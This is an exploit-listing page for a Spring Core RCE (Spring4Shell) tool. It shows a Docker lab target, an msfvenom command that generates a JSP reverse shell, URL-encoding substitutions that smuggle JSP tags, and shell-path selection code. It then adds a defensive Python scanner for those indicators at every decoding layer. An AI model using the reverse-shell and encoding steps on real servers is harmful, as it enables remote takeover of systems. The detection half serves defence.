## https://sploitus.com/exploit?id=6A9484BA-BE10-5232-91F4-678892E7E6DD
Target machine:
```bash
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
```
The reverse shell is essentially modeled on msfvenom:
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
```
After URL-encoding the JSP, use:
```html
%3C%25 to replace %25%7Bc2%7Di (represents <%)
%25%3E to replace %25%7Bsuffix%7Di (represents %>)
```
The code checks the target server type and sets shellpath accordingly:
```python
if self.radioButton_win.isChecked():
    shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
    shellpath = "/bin/sh"
```
Command execution:
![](img/cmd.png)
whoami probe:
![](img/whoami.png)
One-click reverse shell:
![](img/reverse.png)
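
For defenders, the markers from the substitution step above (`%{c2}i`, `%{suffix}i`, and the JSP delimiters they stand for) can be searched for in request bodies and proxy or WAF logs, at every URL-decoding layer. The following Python is an added example, not part of the original tool; `scan_value`, `decoding_layers`, the indicator names and the sample bodies are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the substitution table above, in decoded form.
INDICATORS = {
    "header-placeholder-c2": re.compile(r"%\{c2\}i"),
    "header-placeholder-suffix": re.compile(r"%\{suffix\}i"),
    "jsp-open-tag": re.compile(r"<%"),
    "jsp-close-tag": re.compile(r"%>"),
}
MAX_ROUNDS = 3  # assumption: values are rarely URL-encoded more than three times


def decoding_layers(raw):
    """Yield the raw value and each successive URL-decoded form until stable."""
    current = raw
    yield current
    for _ in range(MAX_ROUNDS):
        decoded = unquote_plus(current)
        if decoded == current:
            return
        current = decoded
        yield current


def scan_value(raw):
    """Return the sorted indicator names found in any decoding layer of raw."""
    hits = set()
    for layer in decoding_layers(raw):  # check every layer, not only the last
        for name, pattern in INDICATORS.items():
            if pattern.search(layer):
                hits.add(name)
    return sorted(hits)


# Constructed request bodies (not captured traffic), harmless placeholders only.
SAMPLES = {
    "benign": "name=alice&comment=100%25+done",
    "placeholders": "field=%25%7Bc2%7Di+demo+%25%7Bsuffix%7Di",
    "double-encoded": "field=%2525%257Bc2%257Di",
    "literal-tags": "field=%3C%25+demo+%25%3E",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:15} {scan_value(body) or 'clean'}")
```

Scanning each layer matters because a further decoding pass can mangle a `<%` that is followed by hex digits, hiding it from a check that only looks at the final form.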